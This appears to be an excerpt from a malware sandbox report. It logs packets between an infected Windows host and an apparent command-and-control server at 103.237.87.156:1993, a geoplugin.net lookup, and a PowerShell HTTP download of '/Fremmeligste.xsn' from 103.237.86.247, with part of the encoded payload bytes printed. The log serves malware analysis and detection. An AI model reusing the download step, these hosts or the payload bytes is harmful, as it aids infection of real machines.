                  Jul 2, 2024 07:49:41.786370039 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786384106 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786398888 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786412954 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786418915 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786452055 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786478043 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786499977 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786515951 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786530018 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786537886 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786576033 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.786638975 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786653042 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786667109 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.786695004 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.797070980 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:41.868459940 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:41.868540049 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030528069 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030555010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030582905 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030606985 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030617952 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030622959 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030637980 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030654907 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030663013 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030678034 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030695915 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030726910 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.030843973 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030934095 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030949116 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030963898 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030980110 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.030983925 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031003952 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031205893 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031224012 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031238079 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031245947 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031253099 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031269073 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031276941 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031282902 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031305075 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031567097 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031583071 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031599045 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031608105 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031616926 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031631947 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031639099 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031672001 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031857014 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031872034 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031886101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031922102 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.031965971 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031980991 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.031996965 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032006979 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032011032 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032026052 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032033920 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032041073 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032054901 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032063961 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032068968 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032108068 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032711983 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032727957 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032744884 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032753944 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032758951 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032773018 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032787085 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032789946 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032800913 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032814980 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032818079 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032829046 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032834053 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032844067 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032871962 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032877922 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032886982 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032902002 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.032915115 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.032946110 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033673048 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033703089 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033716917 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033730984 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033739090 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033745050 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033762932 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033771038 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033776999 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033792019 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033801079 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033807039 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033821106 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033832073 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033834934 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033849955 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033864975 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033870935 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033879995 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.033890963 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.033910990 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034519911 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034547091 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034560919 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034574032 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034588099 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034589052 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034605026 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034619093 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034626007 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034638882 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034640074 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034655094 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034667969 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034682989 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034697056 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034710884 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034713984 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034717083 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034729004 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.034743071 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.034780979 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035523891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035541058 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035554886 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035568953 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035573006 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035583973 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035598040 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035598993 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035614967 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035629034 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035643101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035644054 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035657883 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035666943 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035670996 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035685062 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035696030 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035698891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035717010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.035734892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.035759926 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036410093 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036428928 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036447048 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036461115 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036474943 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036489964 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036506891 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036511898 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036521912 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036535978 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036554098 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036556005 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036566973 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036581993 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036586046 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036595106 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036608934 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036626101 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036633968 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036638975 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036653996 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.036659956 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.036689043 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037322044 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037339926 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037353992 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037362099 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037369013 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037386894 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037391901 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037403107 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037415028 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037422895 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037430048 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037444115 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037458897 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037460089 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037477970 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.037477970 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037493944 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.037522078 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.048124075 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.119354010 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.119437933 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:42.119530916 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:42.170706987 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.480952978 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.489152908 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489176989 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489187956 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489196062 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489198923 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.489204884 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.489231110 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.489245892 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.491339922 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.491350889 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.491370916 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.491463900 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.493119001 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.495821953 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.495831966 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.495840073 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.497989893 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.498080015 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.498089075 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.498102903 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.517544985 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:49:44.523627043 CEST199349722103.237.87.156192.168.2.6
                  Jul 2, 2024 07:49:44.523677111 CEST497221993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:50:05.832549095 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:50:05.833978891 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:50:05.840435982 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:50:35.870153904 CEST199349721103.237.87.156192.168.2.6
                  Jul 2, 2024 07:50:35.871423960 CEST497211993192.168.2.6103.237.87.156
                  Jul 2, 2024 07:50:35.880546093 CEST199349721103.237.87.156192.168.2.6

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 07:49:37.869257927 CEST4918253192.168.2.61.1.1.1
                  Jul 2, 2024 07:49:37.878782988 CEST53491821.1.1.1192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 2, 2024 07:49:37.869257927 CEST192.168.2.61.1.1.10x223aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 2, 2024 07:49:37.878782988 CEST1.1.1.1192.168.2.60x223aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • 103.237.86.247
                  • geoplugin.net

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649711103.237.86.247803516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 07:48:55.349364042 CEST174OUTGET /Fremmeligste.xsn HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Connection: Keep-Alive
                  Jul 2, 2024 07:48:56.319933891 CEST1236INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Mon, 01 Jul 2024 08:12:37 GMT
                  Accept-Ranges: bytes
                  ETag: "6ddb8e6f8ecbda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 05:48:51 GMT
                  Content-Length: 441636
                  Data Raw: 36 77 4c 77 76 6e 45 42 6d 37 73 51 5a 41 38 41 36 77 4a 75 46 2b 73 43 66 71 38 44 58 43 51 45 63 51 47 62 63 51 47 62 75 5a 42 4d 2b 65 5a 78 41 5a 76 72 41 6a 53 33 67 66 45 79 7a 67 42 54 63 51 47 62 63 51 47 62 67 63 46 65 66 51 5a 4b 63 51 47 62 36 77 4a 46 4f 65 73 43 61 79 31 78 41 5a 75 36 37 6b 77 72 74 48 45 42 6d 2b 73 43 62 4b 76 72 41 6a 34 37 63 51 47 62 4d 63 72 72 41 6c 79 51 36 77 4b 50 54 6f 6b 55 43 2b 73 43 32 5a 78 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 6e 57 47 44 77 51 52 78 41 5a 74 78 41 5a 75 42 2b 62 42 2b 75 51 46 38 79 33 45 42 6d 2b 73 43 31 66 53 4c 52 43 51 45 36 77 4b 48 4d 2b 73 43 55 4f 79 4a 77 2b 73 43 49 2f 74 78 41 5a 75 42 77 33 75 64 51 67 42 78 41 5a 76 72 41 75 33 5a 75 74 36 61 74 6e 4e 78 41 5a 76 72 41 6b 42 52 67 66 49 69 49 42 53 54 36 77 4b 75 45 4f 73 43 42 42 69 42 38 76 79 36 6f 75 44 72 41 73 31 45 63 51 47 62 63 51 47 62 36 77 4b 50 66 33 45 42 6d 2b 73 43 37 78 79 4c 44 42 42 78 41 5a 74 78 41 5a 75 4a 44 42 50 72 41 71 50 46 36 77 4a 42 67 55 [TRUNCATED]
                  Data Ascii: 6wLwvnEBm7sQZA8A6wJuF+sCfq8DXCQEcQGbcQGbuZBM+eZxAZvrAjS3gfEyzgBTcQGbcQGbgcFefQZKcQGb6wJFOesCay1xAZu67kwrtHEBm+sCbKvrAj47cQGbMcrrAlyQ6wKPTokUC+sC2ZxxAZvR4nEBm+sCnWGDwQRxAZtxAZuB+bB+uQF8y3EBm+sC1fSLRCQE6wKHM+sCUOyJw+sCI/txAZuBw3udQgBxAZvrAu3Zut6atnNxAZvrAkBRgfIiIBST6wKuEOsCBBiB8vy6ouDrAs1EcQGbcQGb6wKPf3EBm+sC7xyLDBBxAZtxAZuJDBPrAqPF6wJBgUJxAZtxAZuB+jSeBAB11nEBm3EBm4lcJAxxAZvrAtfuge0AAwAAcQGbcQGbi1QkCHEBm+sCiLqLfCQE6wIeVesCJ6OJ63EBm+sCZ/mBw5wAAABxAZtxAZtTcQGbcQGbakBxAZvrApuJietxAZvrArhWx4MAAQAAAPDLAXEBm3EBm4HDAAEAAOsCHzDrAuPSU3EBm+sCqBGJ63EBm3EBm4m7BAEAAHEBm3EBm4HDBAEAAHEBm+sC+n1T6wLTrHEBm2r/6wJiWOsCReODwgXrAnG86wIgiTH2cQGbcQGbMclxAZvrAktPixrrAruR6wKDbUHrAhBO6wK3azkcCnXycQGb6wKC5EZxAZvrAi5TgHwK+7h13HEBm+sCMWaLRAr86wJo7OsCBhsp8OsCarhxAZv/0usCDu9xAZu6NJ4EAOsCaDxxAZsxwOsCPFrrAlLui3wkDHEBm3EBm4E0B7tF4d7rAnMlcQGbg8AEcQGb6wJV2znQdeRxAZtxAZuJ+3EBm+sCM7r/1+sC859xAZsSovixtcQYWLTxhOJXzAQZPhceIUSRv8ZyxFSMRLoezM9XTl8+Fx4hRBbNJHfEZIxEuh45EL4tkkTIsyFEupQpPpe0V178PjZjPmAvK9yoYjq0lWIE/2QcOoQ87GrHJp
                  Jul 2, 2024 07:48:56.319960117 CEST1236INData Raw: 71 32 52 66 36 4f 4d 4f 52 6b 48 6a 2b 45 59 4b 71 32 52 66 79 31 56 6a 33 59 46 54 6f 78 37 4e 37 59 69 39 61 32 4f 69 6e 73 33 74 71 77 73 47 38 2f 68 47 55 55 4f 6f 53 32 51 35 70 41 59 44 66 6f 32 4d 44 62 4d 76 68 6c 33 37 74 46 58 6a 37 43
                  Data Ascii: q2Rf6OMORkHj+EYKq2Rfy1Vj3YFTox7N7Yi9a2Oins3tqwsG8/hGUUOoS2Q5pAYDfo2MDbMvhl37tFXj7Cd5t2QMQWjrBch+ZhxBYNGIPHW3N9Il9Uri4zgXwYVQbB4N67MHpaeMA7iQTRTVuWxh7ZtMG3VL9Fvlc+PeDeu8EdjQCh4d67xBoxQD210TR+a9q7HmhD90Th3ujBIDa31uXeMgCl5k6sgoy/RbJlskXh3jq+EQYkE
                  Jul 2, 2024 07:48:56.319972038 CEST1236INData Raw: 41 56 34 69 46 66 4f 79 33 72 65 42 53 66 62 30 49 65 66 73 79 55 64 77 62 64 5a 41 66 69 77 52 61 45 41 53 67 61 4f 45 79 74 6c 5a 4b 2f 52 57 68 62 49 30 58 68 33 75 7a 36 52 70 35 41 71 32 41 78 43 54 6b 4e 43 54 71 79 50 78 6e 71 4c 32 41 70
                  Data Ascii: AV4iFfOy3reBSfb0IefsyUdwbdZAfiwRaEASgaOEytlZK/RWhbI0Xh3uz6Rp5Aq2AxCTkNCTqyPxnqL2ApkEC+o+3ZaDiye3zmaDjrQcQ40CgaWunk0TsnYEGKEoBKxpXec/KsWl5n1IOTIxYf/hW/XkIJvogFQoqMfsQXxgCTMV9NWjBarhZ9V1hE0kOCtpLYhXwDn1jO3Uo6u6NH7BC6uD6Vv1cm/+Deu/6s8mq+smVu7F7PO
                  Jul 2, 2024 07:48:56.320040941 CEST1236INData Raw: 54 76 48 7a 71 79 4f 63 6b 46 6c 72 64 43 4d 71 50 67 34 43 5a 39 4d 61 36 6f 75 4e 6f 35 43 5a 39 48 4a 42 62 76 38 53 53 41 6f 62 33 72 43 6d 41 79 56 52 6b 39 38 30 55 71 2f 44 70 77 50 54 57 42 52 50 77 33 6d 38 56 67 51 34 64 62 61 42 74 6c
                  Data Ascii: TvHzqyOckFlrdCMqPg4CZ9Ma6ouNo5CZ9HJBbv8SSAob3rCmAyVRk980Uq/DpwPTWBRPw3m8VgQ4dbaBtlO+TMZAm6ReFmhl/ty+37rFO7MWAo3WRlVzqrv3/Xa2Aodk75EejZaD2ydnznQz7n6mFqTw4JXU3GxG3zIJpCZLdScfL5P1C1dC3volY4t4drR5mh7TK2tbclVlAGYY4vKd3EHju4HmUj5XBE0Drt5HnPegrRurL/3
                  Jul 2, 2024 07:48:56.320056915 CEST896INData Raw: 4d 71 6d 6b 77 41 44 77 77 6b 47 5a 35 71 4f 79 51 49 66 5a 35 37 78 42 63 4a 61 7a 78 45 30 62 70 61 44 39 36 37 52 56 4f 6c 64 70 58 43 34 64 4b 2f 58 4d 54 45 64 6a 59 59 72 61 41 6c 34 49 76 63 33 54 6d 42 2b 61 73 58 6b 64 74 43 71 2b 74 67
                  Data Ascii: MqmkwADwwkGZ5qOyQIfZ57xBcJazxE0bpaD967RVOldpXC4dK/XMTEdjYYraAl4Ivc3TmB+asXkdtCq+tgvlnWqzlh/nxJfiGRYBgzGfUJ6/1Ox1XV1P2Z35/r6LuMuY50YqBwQPNkI/i2QjKi4NkmwTOiqNnj/CgIe3kaq/YN4WNzA9O8foZO/hzLlbNlK+Qj2BzjE7Nk+ZLQIzqva2c1gmA0A1lC6+jZaD26VnzmcT/qiLzMP
                  Jul 2, 2024 07:48:56.577244997 CEST1236INData Raw: 79 4f 58 64 51 56 7a 6a 69 6f 37 56 6a 78 75 76 41 55 52 2f 4f 64 42 65 64 41 38 4a 37 79 50 74 74 43 38 30 51 41 62 46 30 33 49 38 4e 72 79 78 54 57 4e 34 56 53 62 49 61 6a 34 53 31 35 31 32 4c 48 69 54 66 55 50 52 52 66 6a 32 46 76 65 54 41 74
                  Data Ascii: yOXdQVzjio7VjxuvAUR/OdBedA8J7yPttC80QAbF03I8NryxTWN4VSbIaj4S1512LHiTfUPRRfj2FveTAt7t9KJuHeu/BzXVZsvnnL0C9SbOsuAQNvKeQAjGXG0lC9G6iTw80gS/zhBPov/bVJVFZ5vGDqn7gyl4oWWgrHfWhfSLVso7XEEvVloYxfSM7m4+vEIqJjJqSMJ8wD16HY2Q3GRsau70WjcEnugxcbUsoI/pMgEB2IQ
                  Jul 2, 2024 07:48:56.577287912 CEST1236INData Raw: 7a 4f 63 72 4c 53 57 41 74 75 2b 58 48 42 71 75 67 6f 6d 6a 4c 4e 50 5a 73 74 66 73 32 79 38 70 59 71 5a 30 4a 67 6c 54 72 53 46 72 52 46 50 2b 36 37 52 65 46 2f 45 30 51 59 6d 2b 6a 2f 52 78 51 4c 51 66 47 72 70 74 4e 4a 54 6f 57 31 48 34 67 4a
